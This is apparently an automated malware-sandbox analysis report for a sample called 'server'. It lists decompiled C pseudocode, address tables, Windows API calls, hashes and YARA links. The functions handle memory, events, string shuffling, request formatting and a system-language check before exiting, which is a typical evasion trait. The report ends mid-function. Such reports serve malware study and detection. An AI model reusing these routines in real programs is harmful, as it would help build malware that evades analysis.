0x02bd4e2a
0x02bd4e2a
0x02bd4e82
0x02bd4e8e
0x02bd4e84
0x02bd4e87
0x02bd4e87
0x02bd4e82
0x02bd4dfb
0x00000000
0x02bd4dc2
0x02bd4d6b
0x02bd4d6e
0x02bd4d75
0x02bd4d7b
0x02bd4d7e
0x02bd4d80
0x02bd4d8c
0x02bd4d8f
0x02bd4d8f
0x02bd4d95
0x02bd4d9a
0x02bd4d9a
0x02bd4da0
0x00000000
0x02bd4da0
0x02bd4cae
0x00000000
0x02bd4cd5
0x02bd4cd5
0x02bd4ce1
0x02bd4cf4
0x02bd4cfa
0x02bd4d02
0x00000000
0x02bd4d02

APIs

StrChrA.SHLWAPI(02BD6A76,0000005F,00000000,00000000,00000104), ref: 02BD4CC7
lstrcpy.KERNEL32(?,?), ref: 02BD4CF4

Part of subcall function 02BD6536: lstrlen.KERNEL32(?,00000000,035B9E40,00000000,02BD6F0A,035BA063,43175AC3,?,?,?,?,43175AC3,00000005,02BDA00C,4D283A53,?), ref: 02BD653D
Part of subcall function 02BD6536: mbstowcs.NTDLL ref: 02BD6566
Part of subcall function 02BD6536: memset.NTDLL ref: 02BD6578

Part of subcall function 02BD5B0E: lstrlenW.KERNEL32(?,?,?,02BD4E5D,3D02BD90,80000002,02BD6A76,02BD57D1,74666F53,4D4C4B48,02BD57D1,?,3D02BD90,80000002,02BD6A76,?), ref: 02BD5B33

Part of subcall function 02BD61DA: RtlFreeHeap.NTDLL(00000000,00000000,02BD6383,00000000,?,00000000,00000000), ref: 02BD61E6

lstrcpy.KERNEL32(?,00000000), ref: 02BD4D16

Strings

\, xrefs: 02BD4CFA
(, xrefs: 02BD4D77

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: e14d8c276a2afe62f620c5f8932f36458495744d47fd829f2af4d9095c13d33c
Instruction ID: 5915393b0b8e8ec9a360a9afa0afa083db232c674e21ebf2ea8c99636fc142f4
Opcode Fuzzy Hash: e14d8c276a2afe62f620c5f8932f36458495744d47fd829f2af4d9095c13d33c
Instruction Fuzzy Hash: CA51F57250020AFFDF259FA4DD40EEA7BBAEB08394F008998FA1596160F731D965EF50

Uniqueness

Uniqueness Score: -1.00%

Function 02BD454F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E02BD454F(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t53 = __ecx;
				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0x2bda160() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x2bda174(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E02BD33DC(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0x2bda160() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E02BD61DA(_v16);
							if(_t58 == 0) {
								_t58 = E02BD2B18(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E02BD16B2( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E02BD16B2( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}

0x02bd454f
0x02bd455e
0x02bd4563
0x02bd4565
0x02bd456a
0x02bd456b
0x02bd4570
0x02bd4571
0x02bd457c
0x02bd45ad
0x02bd45b2
0x02bd4675
0x02bd4678
0x02bd467e
0x02bd467e
0x02bd45bf
0x02bd45c7
0x02bd4672
0x00000000
0x02bd4672
0x02bd45d2
0x02bd45d7
0x02bd45dc
0x02bd4664
0x02bd4665
0x02bd4665
0x02bd466b
0x00000000
0x02bd466b
0x02bd45e2
0x02bd45e4
0x02bd45ea
0x02bd45eb
0x02bd45eb
0x02bd45ee
0x02bd45f1
0x02bd45f7
0x02bd45fc
0x02bd45fd
0x02bd4602
0x02bd4605
0x02bd4610
0x00000000
0x00000000
0x02bd4618
0x02bd4620
0x02bd4649
0x02bd464c
0x02bd4653
0x02bd465e
0x02bd465e
0x00000000
0x02bd4653
0x02bd462c
0x02bd4630
0x00000000
0x00000000
0x02bd4632
0x02bd4637
0x00000000
0x00000000
0x02bd4639
0x02bd4639
0x02bd463e
0x00000000
0x00000000
0x02bd4640
0x02bd4641
0x02bd4644
0x02bd4644
0x02bd45eb
0x02bd4584
0x02bd458c
0x02bd45a5
0x02bd45a7
0x00000000
0x00000000
0x00000000
0x02bd45a7
0x02bd4598
0x02bd459c
0x00000000
0x00000000
0x02bd45a2
0x00000000

APIs

ResetEvent.KERNEL32(?), ref: 02BD4565
GetLastError.KERNEL32 ref: 02BD457E

Part of subcall function 02BD16B2: WaitForMultipleObjects.KERNEL32(00000002,02BD7C47,00000000,02BD7C47,?,?,?,02BD7C47,0000EA60), ref: 02BD16CD

ResetEvent.KERNEL32(?), ref: 02BD45F7
GetLastError.KERNEL32 ref: 02BD4612

Strings

@MqtNqt, xrefs: 02BD457E, 02BD4612

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: ErrorEventLastReset$MultipleObjectsWait
String ID: @MqtNqt
API String ID: 2394032930-2883916605
Opcode ID: 4181354956f1467b0f57c79893e426015de4c63f3af8996e360a803bd82e39f1
Instruction ID: c1eb03102aa8253ee10c3a599b99ba8c47464a0c62d963f7b04bc189c90d247b
Opcode Fuzzy Hash: 4181354956f1467b0f57c79893e426015de4c63f3af8996e360a803bd82e39f1
Instruction Fuzzy Hash: E131BF36A40604ABCB219FA5DC44BEEB7BAFF84364F1449E8E556E7190FB30E9458B10

Uniqueness

Uniqueness Score: -1.00%

Function 02BD5364 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E02BD5364(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x2bda3cc; // 0x35b9600
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x2bda3cc; // 0x35b9600
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x2bda030) {
					HeapFree( *0x2bda2d8, 0, _t8);
				}
				_t13[1] = E02BD12C6(_v0, _t13);
				_t10 =  *0x2bda3cc; // 0x35b9600
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x02bd5364
0x02bd5364
0x02bd536d
0x02bd537d
0x02bd537d
0x02bd5382
0x02bd5387
0x00000000
0x00000000
0x02bd5377
0x02bd5377
0x02bd5389
0x02bd538d
0x02bd539f
0x02bd539f
0x02bd53af
0x02bd53b2
0x02bd53b7
0x02bd53bb
0x02bd53c1

APIs

RtlEnterCriticalSection.NTDLL(035B95C0), ref: 02BD536D
Sleep.KERNEL32(0000000A), ref: 02BD5377
HeapFree.KERNEL32(00000000,00000000), ref: 02BD539F
RtlLeaveCriticalSection.NTDLL(035B95C0), ref: 02BD53BB

Strings

Uqt, xrefs: 02BD539F

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Uqt
API String ID: 58946197-2320327147
Opcode ID: d59dece5da231b5c7a8fc78b8eab1519c0005ed03d0a60fe171a27c2f897477c
Instruction ID: e958198c26a8fef2c06045159f120da5e9b5583be8616ae8ac611b7e8706a98d
Opcode Fuzzy Hash: d59dece5da231b5c7a8fc78b8eab1519c0005ed03d0a60fe171a27c2f897477c
Instruction Fuzzy Hash: 24F05830A82601ABEB24AF68EC58FC63BF9EF44390B44C840F546C7260F730D860CB24

Uniqueness

Uniqueness Score: -1.00%

Function 02BD607C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E02BD607C() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x2bda3cc; // 0x35b9600
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x2bda3cc; // 0x35b9600
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x2bda3cc; // 0x35b9600
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x2bdb142) {
					HeapFree( *0x2bda2d8, 0, _t10);
					_t7 =  *0x2bda3cc; // 0x35b9600
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x02bd607c
0x02bd6085
0x02bd6095
0x02bd6095
0x02bd609a
0x02bd609f
0x00000000
0x00000000
0x02bd608f
0x02bd608f
0x02bd60a1
0x02bd60a6
0x02bd60aa
0x02bd60bd
0x02bd60c3
0x02bd60c3
0x02bd60cc
0x02bd60ce
0x02bd60d2
0x02bd60d8

APIs

RtlEnterCriticalSection.NTDLL(035B95C0), ref: 02BD6085
Sleep.KERNEL32(0000000A), ref: 02BD608F
HeapFree.KERNEL32(00000000), ref: 02BD60BD
RtlLeaveCriticalSection.NTDLL(035B95C0), ref: 02BD60D2

Strings

Uqt, xrefs: 02BD60BD

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Uqt
API String ID: 58946197-2320327147
Opcode ID: 2f631fefb14dce78ac9d7075c64b213f5db50371be964c5ef73258b7b4deb037
Instruction ID: fb6d162e95c6cbb149556cba029bbca474587e1ef40a7d325f36a980f77e2197
Opcode Fuzzy Hash: 2f631fefb14dce78ac9d7075c64b213f5db50371be964c5ef73258b7b4deb037
Instruction Fuzzy Hash: 8AF05E78A826019FE718DF58F8A9B9537B5EB84380B448845E802C7390F330A864CA14

Uniqueness

Uniqueness Score: -1.00%

Function 02BD7040 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E02BD7040(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E02BD33DC(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E02BD61DA(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E02BD33DC((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x2bda318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x02bd7047
0x02bd704e
0x02bd7053
0x02bd7056
0x02bd705d
0x02bd7060
0x02bd7063
0x02bd7068
0x02bd706d
0x02bd71c1
0x02bd71c3
0x02bd71c5
0x02bd71ca
0x02bd71ca
0x02bd7073
0x02bd7076
0x02bd7079
0x02bd707b
0x02bd707b
0x02bd707f
0x00000000
0x00000000
0x02bd7083
0x02bd70af
0x02bd70b4
0x02bd70b6
0x02bd70b6
0x02bd70b9
0x02bd70bc
0x02bd70bc
0x02bd70be
0x00000000
0x02bd7089
0x02bd708b
0x02bd70aa
0x02bd70aa
0x02bd70c1
0x02bd70c1
0x02bd70c2
0x02bd70c2
0x02bd70c5
0x00000000
0x00000000
0x00000000
0x02bd70c5
0x02bd708f
0x02bd70d6
0x02bd70da
0x02bd71b4
0x02bd71b6
0x02bd71b6
0x02bd71b7
0x02bd71ba
0x00000000
0x02bd71ba
0x02bd70e3
0x02bd70f4
0x02bd70f8
0x02bd71b0
0x00000000
0x02bd71b0
0x02bd70fe
0x02bd7101
0x02bd7105
0x02bd7109
0x02bd710e
0x02bd71a6
0x02bd71a6
0x00000000
0x02bd71ac
0x02bd7119
0x02bd7122
0x02bd7136
0x02bd713d
0x02bd7152
0x02bd7158
0x02bd7160
0x00000000
0x00000000
0x00000000
0x00000000
0x02bd7162
0x02bd7162
0x02bd7162
0x02bd7169
0x02bd7171
0x00000000
0x00000000
0x02bd7173
0x02bd717c
0x00000000
0x00000000
0x00000000
0x02bd717e
0x02bd7180
0x02bd7183
0x02bd7183
0x02bd7186
0x02bd718a
0x02bd718d
0x02bd7193
0x02bd7196
0x02bd719d
0x00000000
0x02bd7119
0x02bd7094
0x02bd709c
0x02bd70a2
0x02bd70a4
0x02bd70a4
0x02bd70a7
0x02bd70a9
0x00000000
0x02bd70a9
0x02bd7083
0x02bd70c9
0x02bd70ce
0x02bd70d0
0x02bd70d0
0x02bd70d3
0x02bd70d3
0x00000000

APIs

Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8

lstrcpy.KERNEL32(43175AC4,00000020), ref: 02BD713D
lstrcat.KERNEL32(43175AC4,00000020), ref: 02BD7152
lstrcmp.KERNEL32(00000000,43175AC4), ref: 02BD7169
lstrlen.KERNEL32(43175AC4), ref: 02BD718D

Strings

, xrefs: 02BD70D6

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 19d8a2029e6781b89df156163bc7d7416c4a14434cba2eaec107cc9efd70ad21
Instruction ID: d5d09e7b20ffd2f7e2b4fe97945911958441e96977c5ff05e862a80b84392742
Opcode Fuzzy Hash: 19d8a2029e6781b89df156163bc7d7416c4a14434cba2eaec107cc9efd70ad21
Instruction Fuzzy Hash: E651D171A00218EFDF20CF99C484BEDFBB6FF41354F54819AE8199B245EB709A51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02190B24 Relevance: 7.6, APIs: 5, Instructions: 81filetimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,0219098C,0000000A,?,?), ref: 02190B31
CreateFileMappingW.KERNEL32(000000FF,00404188,00000004,00000000,?,?,?,?,54D38000,00000192), ref: 02190B91
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0219098C,0000000A), ref: 02190BBC
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0219098C,0000000A,?,?), ref: 02190BDD
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0219098C,0000000A,?,?), ref: 02190BE5

Memory Dump Source

Source File: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2190000_server.jbxd

Yara matches

Similarity

API ID: File$Time$CloseCreateErrorHandleLastMappingSystemView
String ID:
API String ID: 2685682793-0
Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
Instruction ID: a7de4ef9d85b89b613ff80853d031b625f3f4cf982b10cd029f0e49033f59807
Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
Instruction Fuzzy Hash: E521B3B6540208BFDB20EFA4CC84EAE7BADEB48359F114035FA06E7190E7709D44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02191355 Relevance: 7.5, APIs: 5, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 0219135F
GetModuleHandleA.KERNEL32(00000000), ref: 0219136F
GetCommandLineW.KERNEL32 ref: 0219137A

Part of subcall function 02190F65: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 02190F9A
Part of subcall function 02190F65: Sleep.KERNEL32(00000000,00000030), ref: 02190FE1
Part of subcall function 02190F65: GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 02191009
Part of subcall function 02190F65: GetSystemDefaultUILanguage.KERNEL32 ref: 02191013
Part of subcall function 02190F65: VerLanguageNameA.KERNEL32(?,?,00000004), ref: 02191026

HeapDestroy.KERNEL32 ref: 0219138D
ExitProcess.KERNEL32 ref: 02191394

Memory Dump Source

Source File: 00000000.00000002.569302533.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2190000_server.jbxd

Yara matches

Similarity

API ID: HeapLanguageSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleNameProcessQuerySleep
String ID:
API String ID: 1393419808-0
Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
Instruction ID: 0bce58d7d363ef515ba56096739aa2f050106e77b729f28188fbe18cf40004ff
Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
Instruction Fuzzy Hash: 4FE0B6B0403224ABC7116F70BE0CA4E7E28BB49B527000535E505F2124DB3847818A9C

Uniqueness

Uniqueness Score: -1.00%

Function 02BD35D2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E02BD35D2(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				intOrPtr _t30;
				intOrPtr _t34;
				intOrPtr* _t42;
				void* _t43;
				void* _t46;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_t42 = _a16;
				_t48 = __eax;
				_t22 =  *0x2bda348; // 0x9dd5a8
				_t2 = _t22 + 0x2bdb7bb; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
				if( *0x2bda2ec >= 5) {
					_t30 = E02BD3CE0(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
					L5:
					_a4 = _t30;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x2bda2ec =  *0x2bda2ec + 1;
						L10:
						return _a4;
					}
					_t50 = _a16;
					 *_t48 = _a16;
					_t49 = _v8;
					 *_t42 = E02BD56B9(_t50, _t49);
					_t34 = E02BD77A5(_t49, _t50);
					if(_t34 != 0) {
						 *_a8 = _t49;
						 *_a12 = _t34;
						if( *0x2bda2ec < 5) {
							 *0x2bda2ec =  *0x2bda2ec & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E02BD63F6();
					HeapFree( *0x2bda2d8, 0, _t49);
					goto L9;
				}
				_t51 =  *0x2bda3e0; // 0x35b9c48
				if(RtlAllocateHeap( *0x2bda2d8, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t30 = E02BD2B91(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
				goto L5;
			}

0x02bd35d9
0x02bd35e0
0x02bd35e4
0x02bd35e9
0x02bd35f4
0x02bd3604
0x02bd3653
0x02bd3658
0x02bd3658
0x02bd365b
0x02bd365f
0x02bd3699
0x02bd3699
0x02bd369f
0x02bd36a6
0x02bd36a6
0x02bd3661
0x02bd3664
0x02bd3666
0x02bd3673
0x02bd3675
0x02bd367c
0x02bd36b3
0x02bd36b8
0x02bd36ba
0x02bd36bc
0x02bd36bc
0x00000000
0x02bd36ba
0x02bd367e
0x02bd3685
0x02bd3693
0x00000000
0x02bd3693
0x02bd3606
0x02bd3621
0x02bd363b
0x00000000
0x02bd363b
0x02bd3634
0x00000000

APIs

wsprintfA.USER32 ref: 02BD35F4
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BD3619

Part of subcall function 02BD2B91: GetTickCount.KERNEL32 ref: 02BD2BA8
Part of subcall function 02BD2B91: wsprintfA.USER32 ref: 02BD2BF5
Part of subcall function 02BD2B91: wsprintfA.USER32 ref: 02BD2C12
Part of subcall function 02BD2B91: wsprintfA.USER32 ref: 02BD2C34
Part of subcall function 02BD2B91: wsprintfA.USER32 ref: 02BD2C5B
Part of subcall function 02BD2B91: wsprintfA.USER32 ref: 02BD2C7C
Part of subcall function 02BD2B91: wsprintfA.USER32 ref: 02BD2CA7
Part of subcall function 02BD2B91: HeapFree.KERNEL32(00000000,?), ref: 02BD2CBA

HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 02BD3693

Strings

Uqt, xrefs: 02BD3693

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: wsprintf$Heap$Free$AllocateCountTick
String ID: Uqt
API String ID: 1307794992-2320327147
Opcode ID: 7e77ebf38732752fa9ccfc4e68d5f0f9bee05b6747d405803024899947dce69c
Instruction ID: e2930dddeffba3478801f276bc18001b7f927613e3d3e311b3a7f191e98b4e39
Opcode Fuzzy Hash: 7e77ebf38732752fa9ccfc4e68d5f0f9bee05b6747d405803024899947dce69c
Instruction Fuzzy Hash: 29314C76901208EBCB01DFA5D894BDA3BFDFB08391F1084A2E905E7241E7709654CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02BD6CDF Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E02BD6CDF(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x2bda348; // 0x9dd5a8
					_t5 = _t103 + 0x2bdb038; // 0x3050f485
